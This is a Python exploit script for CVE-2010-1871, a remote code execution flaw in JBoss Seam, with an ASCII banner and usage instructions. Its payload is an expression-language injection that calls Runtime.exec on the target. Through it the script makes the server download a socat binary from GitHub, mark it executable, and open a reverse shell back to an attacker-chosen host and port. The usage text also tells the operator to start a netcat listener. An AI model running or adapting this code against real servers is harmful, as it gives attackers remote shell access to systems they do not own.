# Exploit Title: JBoss Seam Vulnerability - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/3/html/installation_guide/downloading_and_extracting_the_zip_file1
# Version: JBoss Web 2.2.1CR2 - JBoss Web/3.0.0-CR2 
# CVE : CVE-2010-1871

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___  __  ___        __  ___ ______ __ 
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ |/ _ \____  /_ |
 | |     \ \  / /| |__ ______ ) | | | || | | | |______| | (_) |  / / | |
 | |      \ \/ / |  __|______/ /| | | || | | | |______| |> _ <  / /  | |
 | |____   \  /  | |____    / /_| |_| || | |_| |      | | (_) |/ /   | |
  \_____|   \/   |______|  |____|\___/ |_|\___/       |_|\___//_/    |_|                                                                      
                                                                                                                                             
Note: Socat is downloaded to establish the reverse connection from the https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat site.                                                                                                                   
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')   
    
def exploit(url, lhost, lport):
	commands = ['curl+-o+/tmp/tmp/socat+https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat','chmod+777+/tmp/tmp/socat','/tmp/tmp/socat+TCP4%3a'+lhost+'%3a'+lport+'+EXEC%3a/bin/bash']
	payload = '?cid=21&actionOutcome=/pwn.xhtml?user%3d%23{expressions.getClass().forName("java.io.BufferedReader").getDeclaredMethod("readLine").invoke("".getClass().forName("java.io.BufferedReader").getConstructor("".getClass().forName("java.io.Reader")).newInstance("".getClass().forName("java.io.InputStreamReader").getConstructor("".getClass().forName("java.io.InputStream")).newInstance("".getClass().forName("java.lang.Process").getDeclaredMethod("getInputStream").invoke("".getClass().forName("java.lang.Runtime").getDeclaredMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getDeclaredMethod("getRuntime").invoke(null),"'
	
	for command in commands:
	    url_command = url+payload+command+'")))))}}'
	    request(url_command)


def request(url):
	headers = {
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',		
		
	}
	s = Session()
	req = Request('GET', url,headers=headers)
	prepped = req.prepare()
	resp = s.send(prepped,
	    verify=False,
	    timeout=15
	)
	print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
    	print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
    	print('[+] USAGE: python3 %s https://192.168.0.10/app/common/mainPages/login.seam 192.168.0.11 4444\n'%(sys.argv[0]))
    	print('[+] Do not forget to run the listener: nc -lvp 4444\n')
    	exit(0)
    else:
    	exploit(sys.argv[1],sys.argv[2],sys.argv[3])